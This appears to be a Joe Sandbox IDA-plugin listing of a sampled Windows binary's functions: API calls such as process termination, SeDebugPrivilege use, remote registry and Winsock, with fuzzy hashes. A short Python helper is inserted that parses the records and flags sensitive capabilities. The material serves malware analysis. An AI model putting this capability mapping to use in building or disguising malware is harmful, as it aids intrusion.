                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00344062
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003430A5,?,00000001), ref: 00344071
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00344083
                                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003430A5,?,00000001), ref: 0034409C
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003430A5,?,00000001), ref: 003440AE
                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003430A5,?,00000001), ref: 003440F3
                                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003430A5,?,00000001), ref: 00344108
                                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003430A5,?,00000001), ref: 00344113
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                            • String ID:
                                                                            • API String ID: 2156557900-0
                                                                            • Opcode ID: 08041e3de564a4229d138b88bd3e0728c620b5dcc11c55ad614397b713e64eb3
                                                                            • Instruction ID: 522b05a00cd529ce32f5eb9455e94ff48fc2af5eda831d2bed50951177a6ee1c
                                                                            • Opcode Fuzzy Hash: 08041e3de564a4229d138b88bd3e0728c620b5dcc11c55ad614397b713e64eb3
                                                                            • Instruction Fuzzy Hash: 1B314D71500204ABDB13EF54DC89FAD77EEAB68351F12C125F905EA294DBB4BA808B64
                                                                            APIs
                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003030DC
                                                                            • CoUninitialize.OLE32(?,00000000), ref: 00303181
                                                                            • UnregisterHotKey.USER32(?), ref: 003032A9
                                                                            • DestroyWindow.USER32(?), ref: 00375079
                                                                            • FreeLibrary.KERNEL32(?), ref: 003750F8
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00375125
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                            • String ID: close all
                                                                            • API String ID: 469580280-3243417748
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 0031CC15
  • Part of subcall function 0031CCCD: GetClientRect.USER32(?,?), ref: 0031CCF6
  • Part of subcall function 0031CCCD: GetWindowRect.USER32(?,?), ref: 0031CD37
  • Part of subcall function 0031CCCD: ScreenToClient.USER32(?,?), ref: 0031CD5F
• GetDC.USER32 ref: 0037D137
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0037D14A
• SelectObject.GDI32(00000000,00000000), ref: 0037D158
• SelectObject.GDI32(00000000,00000000), ref: 0037D16D
• ReleaseDC.USER32(?,00000000), ref: 0037D175
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0037D200
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
APIs
  • Part of subcall function 0031B34E: GetWindowLongW.USER32(?,000000EB), ref: 0031B35F
  • Part of subcall function 0031B63C: GetCursorPos.USER32(000000FF), ref: 0031B64F
  • Part of subcall function 0031B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0031B66C
  • Part of subcall function 0031B63C: GetAsyncKeyState.USER32(00000001), ref: 0031B691
  • Part of subcall function 0031B63C: GetAsyncKeyState.USER32(00000002), ref: 0031B69F
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0036ED3C
• ImageList_EndDrag.COMCTL32 ref: 0036ED42
• ReleaseCapture.USER32 ref: 0036ED48
• SetWindowTextW.USER32(?,00000000), ref: 0036EDF0
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0036EE03
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0036EEDC
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID
• API String ID: 1924731296-2107944366
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003545FF
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0035462B
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0035466D
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00354682
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0035468F
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003546BF
• InternetCloseHandle.WININET(00000000), ref: 00354706
  • Part of subcall function 00355052: GetLastError.KERNEL32(?,?,003543CC,00000000,00000000,00000001), ref: 00355067
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
• String ID:
• API String ID: 1241431887-3916222277
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,0039DC00), ref: 0035B715
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0039DC00), ref: 0035B749
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0035B8C1
• SysFreeString.OLEAUT32(?), ref: 0035B8EB
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
APIs
• _memset.LIBCMT ref: 003624F5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00362688
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003626AC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003626EC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0036270E
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0036286F
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003628A1
• CloseHandle.KERNEL32(?), ref: 003628D0
• CloseHandle.KERNEL32(?), ref: 00362947
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0036B3F4
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
APIs
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0037DB1B
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0037DB3C
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0037DB51
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0037DB6E
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0037DB95
• DestroyIcon.USER32(00000000,?,?,?,?,?,?,0031A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0037DBA0
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0037DBBD
• DestroyIcon.USER32(00000000,?,?,?,?,?,?,0031A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0037DBC8
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend
• String ID:
• API String ID: 1268354404-0
APIs
  • Part of subcall function 00346EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00345FA6,?), ref: 00346ED8
  • Part of subcall function 00346EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00345FA6,?), ref: 00346EF1
  • Part of subcall function 003472CB: GetFileAttributesW.KERNEL32(?,00346019), ref: 003472CC
• lstrcmpiW.KERNEL32(?,?), ref: 003475CA
• _wcscmp.LIBCMT ref: 003475E2
• MoveFileW.KERNEL32(?,?), ref: 003475FB
Similarity
• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• String ID:
• API String ID: 793581249-0
APIs
• ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0037DAD1,00000004,00000000,00000000), ref: 0031EAEB
• ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0037DAD1,00000004,00000000,00000000), ref: 0031EB32
• ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0037DAD1,00000004,00000000,00000000), ref: 0037DC86
• ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0037DAD1,00000004,00000000,00000000), ref: 0037DCF2
                                                                            Similarity
                                                                            • API ID: ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1268545403-0
                                                                            • Opcode ID: 8dd31ca22b49ed3343ff80b3cfc148abd39944080839853df1d6bd26ff7e4d3e
                                                                            • Instruction ID: 959a689e22c12023c31b40275c97cb9767ad33479c71882a6528825149ea15c6
                                                                            • Opcode Fuzzy Hash: 8dd31ca22b49ed3343ff80b3cfc148abd39944080839853df1d6bd26ff7e4d3e
                                                                            • Instruction Fuzzy Hash: 9B410C7120D3819AD73F4B288D8DBB67BADAF49311F1A840DF84B869A1D676B8C0D311
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0033AEF1,00000B00,?,?), ref: 0033B26C
                                                                            • HeapAlloc.KERNEL32(00000000,?,0033AEF1,00000B00,?,?), ref: 0033B273
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0033AEF1,00000B00,?,?), ref: 0033B288
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,0033AEF1,00000B00,?,?), ref: 0033B290
                                                                            • DuplicateHandle.KERNEL32(00000000,?,0033AEF1,00000B00,?,?), ref: 0033B293
                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0033AEF1,00000B00,?,?), ref: 0033B2A3
                                                                            • GetCurrentProcess.KERNEL32(0033AEF1,00000000,?,0033AEF1,00000B00,?,?), ref: 0033B2AB
                                                                            • DuplicateHandle.KERNEL32(00000000,?,0033AEF1,00000B00,?,?), ref: 0033B2AE
                                                                            • CreateThread.KERNEL32(00000000,00000000,0033B2D4,00000000,00000000,00000000), ref: 0033B2C8
                                                                            Similarity
                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                            • String ID:
                                                                            • API String ID: 1957940570-0
                                                                            • Opcode ID: 08f914e19d326e3ee7a8c2a8c26cad5fcab51b98d509b7fe9f11d6c3136f576f
                                                                            • Instruction ID: b8bd5536ce58725a01a180794607e393960f89acca45326dfd7319ab6cd08447
                                                                            • Opcode Fuzzy Hash: 08f914e19d326e3ee7a8c2a8c26cad5fcab51b98d509b7fe9f11d6c3136f576f
                                                                            • Instruction Fuzzy Hash: A201C9B5240308BFE711AFA5EC8DF6B7BACEB88711F058451FA05DB1E1CAB49800CB61
                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                            • API String ID: 0-572801152
                                                                            • Opcode ID: 69f36229ca305996e29bf0eb3586c49f63a5a9748b5daafda59771946ffaa6fb
                                                                            • Instruction ID: 5f47ec37a7cad2dcaf191490603fc1ed356748c5066462f02d94f5fbdea237b2
                                                                            • Opcode Fuzzy Hash: 69f36229ca305996e29bf0eb3586c49f63a5a9748b5daafda59771946ffaa6fb
                                                                            • Instruction Fuzzy Hash: 4FE1E371A10319AFCF16DFA4C881EEE77B9EF48319F155029ED05AB291E770AD48CB90
                                                                            APIs
                                                                              • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
                                                                              • Part of subcall function 0030936C: __itow.LIBCMT ref: 003093DF
                                                                              • Part of subcall function 0031C6F4: _wcscpy.LIBCMT ref: 0031C717
                                                                            • _wcstok.LIBCMT ref: 0035184E
                                                                            • _wcscpy.LIBCMT ref: 003518DD
                                                                            • _memset.LIBCMT ref: 00351910
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                            • String ID: X$p2;l2;
                                                                            • API String ID: 774024439-843856899
                                                                            • Opcode ID: 9a996619d63ac11a3e284392a6d7f631a83844efb5be9ac987c4fce0df259b98
                                                                            • Instruction ID: 0c4b0701416bd0f79936d2da6c3bef386a7768589927a05fe9aad9af6f0df1fd
                                                                            • Opcode Fuzzy Hash: 9a996619d63ac11a3e284392a6d7f631a83844efb5be9ac987c4fce0df259b98
                                                                            • Instruction Fuzzy Hash: 33C18D715053409FC726EF64C891F9AB7E4BF85354F00496DF9999B2A2DB30ED08CB82
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00369B19
                                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00369B2D
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00369B47
                                                                            • _wcscat.LIBCMT ref: 00369BA2
                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00369BB9
                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00369BE7
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSend$Window_wcscat
                                                                            • String ID: SysListView32
                                                                            • API String ID: 307300125-78025650
                                                                            • Opcode ID: 480967c2ea38893f2cc52e96671e3affbd3246a564e474713e95948c40f154db
                                                                            • Instruction ID: 2643333ffea2b976097b4c43d14c033729a2d76994dec3b825d8ed4e47c05c7c
                                                                            • Opcode Fuzzy Hash: 480967c2ea38893f2cc52e96671e3affbd3246a564e474713e95948c40f154db
                                                                            • Instruction Fuzzy Hash: F241AD70A00308ABDF229FA4DC85FEA77FCEB08350F11856AF549E7292D6719D84CB64
                                                                            APIs
                                                                              • Part of subcall function 00346532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00346554
                                                                              • Part of subcall function 00346532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00346564
                                                                              • Part of subcall function 00346532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 003465F9
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0036179A
                                                                            • GetLastError.KERNEL32 ref: 003617AD
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003617D9
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00361855
                                                                            • GetLastError.KERNEL32(00000000), ref: 00361860
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00361895
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                            • String ID: SeDebugPrivilege
                                                                            • API String ID: 2533919879-2896544425
                                                                            • Opcode ID: e7352e637d35eeddf0904205b8590594feb5fcc312a7a1f1858cdf395cdebca7
                                                                            • Instruction ID: 968b7361f96b692b066dda9bdd743c7648df18e40255bb6909d9e3f3a7f74a51
                                                                            • Opcode Fuzzy Hash: e7352e637d35eeddf0904205b8590594feb5fcc312a7a1f1858cdf395cdebca7
                                                                            • Instruction Fuzzy Hash: F941A475600201AFDB07EF54C8E5FAEB7A5AF58310F09C099F9069F2D2DB74A944CB91
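The records above (and the Winsock record further down, whose "#17.WSOCK32" call is an import by ordinal) follow one fixed shape: an "APIs" list, an optional "Strings" list and a "Similarity" block that always ends with "Instruction Fuzzy Hash". The following is an added example, not Joe Sandbox code, that parses that shape from the report text and flags the API/string combinations an analyst would look at first (process termination with OpenProcess/TerminateProcess, Toolhelp32 enumeration, the SeDebugPrivilege string, remote registry, and Winsock I/O). The sample input is two records copied from this section (the second one is truncated on the page, so its closing hash line is a placeholder); the flag rules and the wsock32 ordinal table are the example's own assumptions.

```python
"""Triage helper for the per-function records in a Joe Sandbox IDA-plugin listing.

Added example, not Joe Sandbox code. Parses records shaped like the ones in this
section ("APIs", optional "Strings", then "Similarity" ending in "Instruction Fuzzy
Hash") and flags API/string combinations worth a closer look. The flag rules and
the ordinal table are this example's assumptions, not something the report defines.
"""
from __future__ import annotations
import re
from collections import namedtuple
from dataclasses import dataclass, field

# wsock32.dll exports the Winsock 1.1 calls by ordinal; the report prints an
# unresolved ordinal import as "#17.WSOCK32". Only the ordinals below are mapped.
WSOCK32_ORDINALS = {1: "accept", 2: "bind", 3: "closesocket", 4: "connect", 16: "recv",
                    17: "recvfrom", 18: "select", 19: "send", 20: "sendto", 23: "socket"}

API_RE = re.compile(r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
                    r"(?P<api>#?\w+)\.(?P<mod>\w+)(?:\([^)]*\))?,? ref: (?P<ref>[0-9A-F]+)$")
STRING_RE = re.compile(r"^•\s+(?P<text>.*?), xrefs: [0-9A-F]+$")
KV_RE = re.compile(r"^•\s+(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

# Constructed sample: two records copied from this section. The second record is
# cut off on the page, so its closing hash line is a placeholder.
SAMPLE = """\
APIs
  • Part of subcall function 00346532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00346554
  • Part of subcall function 00346532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00346564
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0036179A
• GetLastError.KERNEL32 ref: 003617AD
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00361855
• CloseHandle.KERNEL32(00000000), ref: 00361895
Strings
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
• Instruction Fuzzy Hash: F941A475600201AFDB07EF54C8E5FAEB7A5AF58310F09C099F9069F2D2DB74A944CB91
APIs
• select.WSOCK32 ref: 00359691
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003596E9
• inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0039DC00), ref: 00359765
Similarity
• API ID: ErrorLast_strlen$htonsinet_ntoaselect
• String ID:
• Instruction Fuzzy Hash: (placeholder: record truncated on the page)
"""

# subcall = address of the called subroutine when Joe lists the call as "Part of subcall"
ApiCall = namedtuple("ApiCall", "api module ref subcall")

@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    similarity: dict[str, str] = field(default_factory=dict)

    def api_names(self) -> set[str]:
        return {c.api for c in self.calls}

    def all_strings(self) -> set[str]:
        # "String ID" joins the function's string constants with "$"
        sid = self.similarity.get("String ID", "")
        return set(self.strings) | {s for s in sid.split("$") if s}

def resolve_ordinal(api: str, module: str) -> str:
    """Map '#17' in WSOCK32 to 'recvfrom'; anything unknown is returned unchanged."""
    if api.startswith("#") and module.upper() == "WSOCK32":
        return WSOCK32_ORDINALS.get(int(api[1:]), api)
    return api

def parse_records(text: str) -> list[FunctionRecord]:
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings", "Similarity"):
            section = line
        elif section == "APIs" and (m := API_RE.match(line)):
            cur.calls.append(ApiCall(resolve_ordinal(m["api"], m["mod"]), m["mod"], m["ref"], m["sub"]))
        elif section == "Strings" and (m := STRING_RE.match(line)):
            cur.strings.append(m["text"])
        elif section == "Similarity" and (m := KV_RE.match(line)):
            cur.similarity[m["key"]] = m["val"].strip()
            if m["key"] == "Instruction Fuzzy Hash":  # last line of every record
                records.append(cur)
                cur, section = FunctionRecord(), None
    return records

def triage(rec: FunctionRecord) -> list[str]:
    """Heuristic flags for one record (this example's rules, not the sandbox's)."""
    apis, strings, flags = rec.api_names(), rec.all_strings(), []
    if {"OpenProcess", "TerminateProcess"} <= apis:
        flags.append("terminates other processes")
    if "CreateToolhelp32Snapshot" in apis:
        flags.append("enumerates processes (Toolhelp32)")
    if "SeDebugPrivilege" in strings:
        flags.append("references SeDebugPrivilege (can open protected processes)")
    if "RegConnectRegistryW" in apis:
        flags.append("remote registry access")
    if net := sorted(c.api for c in rec.calls if c.module.upper() in ("WSOCK32", "WS2_32")):
        flags.append("network I/O: " + ", ".join(net))
    return flags
```

Running `parse_records` over the whole listing and printing `triage(rec)` next to each record's last `ref` gives a first-pass index of the runtime's sensitive routines; the "Memory Dump Source" and "Joe Sandbox IDA Plugin" lines are ignored because they match none of the three patterns.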
                                                                            APIs
                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 003458B8
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: IconLoad
                                                                            • String ID: blank$info$question$stop$warning
                                                                            • API String ID: 2457776203-404129466
                                                                            • Opcode ID: 441637a01162c2664d1e3006dd842203355e1aeb89aa42f209361d24128d774d
                                                                            • Instruction ID: d8d3c117d334da3c4ed0bbad8ccac87a28c8b51d5dce3c151359c8baebd0907d
                                                                            • Opcode Fuzzy Hash: 441637a01162c2664d1e3006dd842203355e1aeb89aa42f209361d24128d774d
                                                                            • Instruction Fuzzy Hash: 8111EB32B49756BBE7075A54AC92DEA33DC9F15714B20003AF610AE683EB70BA044264
                                                                            APIs
                                                                            • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0034A806
                                                                            Similarity
                                                                            • API ID: ArraySafeVartype
                                                                            • String ID:
                                                                            • API String ID: 1725837607-0
                                                                            • Opcode ID: a1dfc0d00a75dedfb5ce4f6d3a58b804f37e84765e72fe853944badb547f2c1d
                                                                            • Instruction ID: 50fa06c16c2ba12814762fac146c4a12b6873aa63d9b87efb763c93b4ee09120
                                                                            • Opcode Fuzzy Hash: a1dfc0d00a75dedfb5ce4f6d3a58b804f37e84765e72fe853944badb547f2c1d
                                                                            • Instruction Fuzzy Hash: E8C19D75A4461ADFDB06DF98C481BEEBBF4FF08315F24406AE605EB281D734A941CB91
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00346B63
                                                                            • LoadStringW.USER32(00000000), ref: 00346B6A
                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00346B80
                                                                            • LoadStringW.USER32(00000000), ref: 00346B87
                                                                            • _wprintf.LIBCMT ref: 00346BAD
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00346BCB
                                                                            Strings
                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00346BA8
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                            • API String ID: 3648134473-3128320259
                                                                            • Opcode ID: 58514fd0a0011d4c0b875022a1ba703187a9f24e4f260221127cd555f3e9f5f7
                                                                            • Instruction ID: ef786d9f0111b7cf6c142704c9fe94893bd39e801c696fb00f96f5efce010804
                                                                            • Opcode Fuzzy Hash: 58514fd0a0011d4c0b875022a1ba703187a9f24e4f260221127cd555f3e9f5f7
                                                                            • Instruction Fuzzy Hash: 090162F6500318BFEB12AB909D89EF7336CDB04304F004491B745D6081EA749E848F75
                                                                            APIs
                                                                              • Part of subcall function 00363C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00362BB5,?,?), ref: 00363C1D
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00362BF6
                                                                            Similarity
                                                                            • API ID: BuffCharConnectRegistryUpper
                                                                            • String ID:
                                                                            • API String ID: 2595220575-0
                                                                            • Opcode ID: 761b3d819433c888344bf2d269bce71234f4389a38c3d611da4b38dbff793b61
                                                                            • Instruction ID: 4322ed92e994015ec8bf1f3850119863969015af85aebbf53b0496895d6e951f
                                                                            • Opcode Fuzzy Hash: 761b3d819433c888344bf2d269bce71234f4389a38c3d611da4b38dbff793b61
                                                                            • Instruction Fuzzy Hash: A4918A712042019FCB06EF64C895B6EB7E9FF98310F05885DF9969B2A2DB34E945CF42
                                                                            APIs
                                                                            • select.WSOCK32 ref: 00359691
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0035969E
                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 003596C8
                                                                             • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003596E9 (import by ordinal; wsock32 ordinal 17 is recvfrom)
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 003596F8
                                                                            • htons.WSOCK32(?,?,?,00000000,?), ref: 003597AA
                                                                            • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0039DC00), ref: 00359765
                                                                              • Part of subcall function 0033D2FF: _strlen.LIBCMT ref: 0033D309
                                                                            • _strlen.LIBCMT ref: 00359800
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: ErrorLast_strlen$htonsinet_ntoaselect
• String ID:
• API String ID: 3480843537-0
• Opcode ID: 93b871b40e89fccfc126e6d0991e4b4ab762384e6d746d6969051e2283e1fe7b
• Instruction ID: f1f8aa71b4aa367d81800791539462e979cd7c84c88d06dc87866180c83c71e8
• Opcode Fuzzy Hash: 93b871b40e89fccfc126e6d0991e4b4ab762384e6d746d6969051e2283e1fe7b
• Instruction Fuzzy Hash: A981AE71504200ABC716EF64CC95FABB7E8EF89714F104A1EF9559B2E1EB70D908CB92
APIs
• __mtinitlocknum.LIBCMT ref: 0032A991
  • Part of subcall function 00327D7C: __FF_MSGBANNER.LIBCMT ref: 00327D91
  • Part of subcall function 00327D7C: __NMSG_WRITE.LIBCMT ref: 00327D98
  • Part of subcall function 00327D7C: __malloc_crt.LIBCMT ref: 00327DB8
• __lock.LIBCMT ref: 0032A9A4
• __lock.LIBCMT ref: 0032A9F0
• InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,003B6DE0,00000018,00335E7B,?,00000000,00000109), ref: 0032AA0C
• EnterCriticalSection.KERNEL32(8000000C,003B6DE0,00000018,00335E7B,?,00000000,00000109), ref: 0032AA29
• LeaveCriticalSection.KERNEL32(8000000C), ref: 0032AA39
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
• String ID:
• API String ID: 1422805418-0
• Opcode ID: c2555286d82d843a2cef966e489dba2547f59c5cfaad3f06093311ada9c64d08
• Instruction ID: e9b12ac200ab619a73f022efd4fb7b5ad7746be3140ef41d0ba24bcdd2b7ffad
• Opcode Fuzzy Hash: c2555286d82d843a2cef966e489dba2547f59c5cfaad3f06093311ada9c64d08
